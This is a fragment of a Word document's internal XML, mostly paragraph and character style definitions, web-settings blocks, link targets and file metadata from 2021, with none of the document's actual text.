      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00D05018"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="240" w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00DE470D"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="95B3D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6AE"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0F253F"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E06EDA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="17375E"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00754829"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007548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4829"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00754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54829"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00F71EE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EE9"/>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rsid w:val="009120E2"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="DejaVu Serif" w:eastAsia="DejaVu Sans" w:hAnsi="DejaVu Serif" w:cs="Lucidasans"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:link w:val="BodyText"/>
    <w:semiHidden/>
    <w:rsid w:val="009120E2"/>
    <w:rPr>
      <w:rFonts w:ascii="DejaVu Serif" w:eastAsia="DejaVu Sans" w:hAnsi="DejaVu Serif" w:cs="Lucidasans"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D05018"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="GridTable31">
    <w:name w:val="Grid Table 31"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="00336ACC"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00012B5D"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C6FCF"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005A6C8F"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005A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8F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005A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8F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00DE470D"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="95B3D7"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="MediumGrid21">
    <w:name w:val="Medium Grid 21"/>
    <w:link w:val="MediumGrid2Char"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00FF5CC7"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="MediumGrid2Char">
    <w:name w:val="Medium Grid 2 Char"/>
    <w:link w:val="MediumGrid21"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00FF5CC7"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="h1">
    <w:name w:val="h1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CE1C5C"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="LightList-Accent11">
    <w:name w:val="Light List - Accent 11"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="61"/>
    <w:rsid w:val="00F11D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Code">
    <w:name w:val="HTML Code"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C579AC"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E23B2"/>
    <w:pPr>
      <w:ind w:left="660"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="006156AE"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007F2B10"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00393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33">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="264459083">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="337196651">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="371199122">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="535197395">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="767501033">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="833839002">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="919407664">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1005978201">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1280528242">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1546604130">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1600286740">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1638535456">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1656227920">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1725716131">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1769958110">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2107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192.168.19.115/?fbclid=IwAR1Kn-5-QDqUGPt5cUQDHIhPd17Hf2gRVj_2f30pGecHmhNpR1zxq-VLyo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9520938@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mailto:19520250@gm.ui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cnsc@192.168.19.115"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EDF7-8E27-41DE-A1ED-3C235A24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0</Words>
  <Characters>11744</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>97</Lines>
  <Paragraphs>27</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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dcterms:created xsi:type="dcterms:W3CDTF">2021-10-20T05:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-28T09:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>